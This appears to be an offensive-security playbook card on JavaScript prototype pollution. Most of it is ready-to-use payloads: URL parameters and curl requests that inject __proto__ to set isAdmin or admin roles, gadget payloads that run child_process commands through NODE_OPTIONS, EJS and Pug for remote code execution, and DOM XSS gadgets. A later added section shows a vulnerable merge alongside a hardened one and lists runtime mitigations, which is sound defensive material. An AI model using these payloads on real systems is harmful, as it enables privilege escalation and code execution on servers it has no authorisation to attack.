attack-prototype-pollution
JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation
| Field | Value |
|---|---|
| name | attack-prototype-pollution |
| description | JavaScript prototype pollution — __proto__ injection, constructor.prototype, gadget chain exploitation |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["prototype-pollution","javascript","web","xss","attack"] |
| tech_stack | ["javascript","nodejs","web"] |
| cwe_ids | ["CWE-1321"] |
| chains_with | ["attack-ssti"] |
| prerequisites | [] |
| severity_boost | {"attack-ssti":"Prototype pollution → SSTI gadgets = RCE"} |
Exploit JavaScript prototype pollution to modify Object.prototype, leading to XSS, privilege escalation, or RCE via gadget chains.
URL-based pollution:

```text
https://TARGET/?__proto__[polluted]=1
https://TARGET/?__proto__.polluted=1
https://TARGET/?constructor[prototype][polluted]=1
https://TARGET/#__proto__[polluted]=1
```
Verify in browser console:

```javascript
console.log(({}).polluted) // Should print "1" if vulnerable
```
```bash
# Merge/patch endpoints
curl -X POST https://TARGET/api/settings \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"isAdmin": true}}'

curl -X PATCH https://TARGET/api/user/profile \
  -d '{"constructor": {"prototype": {"role": "admin"}}}'

# Nested object merge
curl -X PUT https://TARGET/api/config \
  -d '{"a": {"__proto__": {"polluted": true}}}'

# RCE via child_process gadget
curl -X POST https://TARGET/api/merge \
  -H "Content-Type: application/json" \
  -d '{"__proto__": {"shell": "/proc/self/exe", "argv0": "console.log(require(\"child_process\").execSync(\"id\").toString())", "NODE_OPTIONS": "--require /proc/self/cmdline"}}'

# EJS template gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"outputFunctionName": "x;process.mainModule.require(\"child_process\").execSync(\"id\");s"}}'

# Handlebars gadget
curl -X POST https://TARGET/api/settings \
  -d '{"__proto__": {"type": "Program", "body": [{"type": "MustacheStatement", "params": [], "path": {"type": "PathExpression", "original": "constructor"}}]}}'
```
Common DOM gadgets when Object.prototype is polluted:

```javascript
// innerHTML gadget
Object.prototype.innerHTML = '<img src=x onerror=alert(1)>'
// src gadget
Object.prototype.src = 'javascript:alert(1)'
// href gadget
Object.prototype.href = 'javascript:alert(1)'
// data-* attributes
Object.prototype['data-tooltip'] = '<img src=x onerror=alert(1)>'
```
Express.js / Pug:

```json
{"__proto__": {"block": {"type": "Text", "val": "x]));process.exit()//"}}}
```

Lodash merge:

```json
{"__proto__": {"polluted": true}}
```
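The Lodash-style merge is the sink every payload on this page depends on. The following is an added example, not code from the original page and not Lodash's implementation: a recursive settings merge in the vulnerable shape, then a hardened version that rejects prototype-reaching keys, only descends into the target's own plain-object slots, and creates new containers with `Object.create(null)`. The `pollutes` helper feeds each merge a constructed `__proto__` body and reports whether `Object.prototype` changed, cleaning up afterwards.

```javascript
// Added example (not from the original page): a recursive settings merge of
// the kind behind the /api/settings and /api/config endpoints above, first
// in its vulnerable shape and then hardened. Illustrative code, not Lodash's.

// Vulnerable: iterates every key of the source and resolves target[key]
// without an ownership check, so a key named "__proto__" yields
// Object.prototype and the nested values are written onto it.
function unsafeMerge(target, source) {
  for (const key in source) {
    const value = source[key];
    if (value !== null && typeof value === 'object') {
      if (target[key] === null || typeof target[key] !== 'object') target[key] = {};
      unsafeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Hardened: refuse the keys that can reach a prototype (failing closed so the
// attempt is visible), descend only into the target's own object slots, and
// build new containers without a prototype so nothing inherited is reachable.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BLOCKED_KEYS.has(key)) {
      throw new Error(`rejected key "${key}" in merge input`);
    }
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== 'object') {
        target[key] = Object.create(null);
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Run a merge against a constructed __proto__ payload and report whether the
// merge threw and whether Object.prototype was modified; always cleans up.
function pollutes(mergeFn) {
  const payload = JSON.parse('{"__proto__": {"isAdmin": true}}'); // constructed body
  let threw = false;
  try {
    mergeFn({}, payload);
  } catch (_err) {
    threw = true;
  }
  const polluted = ({}).isAdmin === true;
  delete Object.prototype.isAdmin; // undo any pollution so later code is unaffected
  return { threw, polluted };
}

console.log('unsafeMerge:', JSON.stringify(pollutes(unsafeMerge))); // polluted: true
console.log('safeMerge:  ', JSON.stringify(pollutes(safeMerge)));   // threw: true, polluted: false
```

Two runtime hardenings complement the code-level fix and also blunt the DOM and template gadgets above: `Object.freeze(Object.prototype)` at startup, and Node's `--disable-proto=delete` flag, which removes the `Object.prototype.__proto__` accessor so the `__proto__` key no longer resolves to a prototype at all (both are independent of the merge library in use).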
| Finding | Severity |
|---|---|
| Server-side RCE via prototype pollution gadget | Critical (P1) |
| Privilege escalation (isAdmin=true) | Critical (P1) |
| Client-side XSS via DOM gadget | High (P2) |
| Prototype pollution without known gadget | Medium (P3) |